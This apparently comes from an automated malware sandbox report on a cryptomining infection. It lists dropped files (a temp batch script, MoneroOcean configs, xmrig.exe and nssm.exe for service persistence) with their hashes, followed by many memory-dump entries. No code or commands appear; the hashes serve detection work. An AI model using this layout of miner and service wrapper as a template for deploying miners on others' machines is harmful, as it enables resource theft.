5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\s.bat

Filesize
14KB

MD5
12a235844829126b56d90f5ff606c555

SHA1
7fed9b9b08a9849dd61f32a6d731e5dd2f94ccc8

SHA256
dfb89d7d439866741417e5aaee451488036f3d4aff806bf6d448fadeefa717ab

SHA512
ad72e804d21b3acad05476e02c43d80b4d627d7ac5d6a7ae315a58e7cd34cb0b0560182526839e622bcf13c48c1549e1e331a3b7799fdd1438cb471e556ee62a

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
8b25f31750a1bd2a5184de93c2f727c6

SHA1
a12969638354fc5268be07eda6bc4352cc40d488

SHA256
aa99ae2f4627f2d7e2a9c19474248667b8654d02f68cacbb2d644ee6e6de9da4

SHA512
b3d6c24f246d0e2afd58a4dec93007df1afaf70ea3394c03d8d661cf06570b5c6ca0337524f503b2cef113da70b65d482b8d53d77bca4941fc99a2e918f415ca

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
71469039aeadb148b9be6bef59efea0e

SHA1
368aae717236f31850399ff06a973dc7e6dafedf

SHA256
a959d78ed05393b0ee462c47573deb247d69a495e5fb2eb7991c99d60b48bac2

SHA512
fd242b21996fb01f62cd6d23cd899b39890528918cd8fd145c82a4af4069b0278e601536ccecbf9d077a1c6e680a1cad416067878a72a06ea50a6546375f56f9

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/948-197-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-236-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-235-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-234-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-185-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-186-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-187-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-188-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-189-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-190-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-191-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-192-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-193-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-194-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-195-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-196-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-233-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-198-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-199-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-200-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-201-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-202-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-203-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-232-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-210-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-221-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-224-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-226-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-227-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-228-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-229-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-230-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/948-231-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2448-11-0x00000215762E0000-0x0000021576302000-memory.dmp

Filesize
136KB

Download
memory/3284-237-0x00000236B5E40000-0x00000236B5E50000-memory.dmp

Filesize
64KB

Download
memory/3420-26-0x0000025CC9CA0000-0x0000025CC9CAA000-memory.dmp

Filesize
40KB

Download
memory/3420-27-0x0000025CC9CD0000-0x0000025CC9CE2000-memory.dmp

Filesize
72KB

Download
memory/3708-53-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3708-52-0x00000000019D0000-0x00000000019F0000-memory.dmp

Filesize
128KB

Download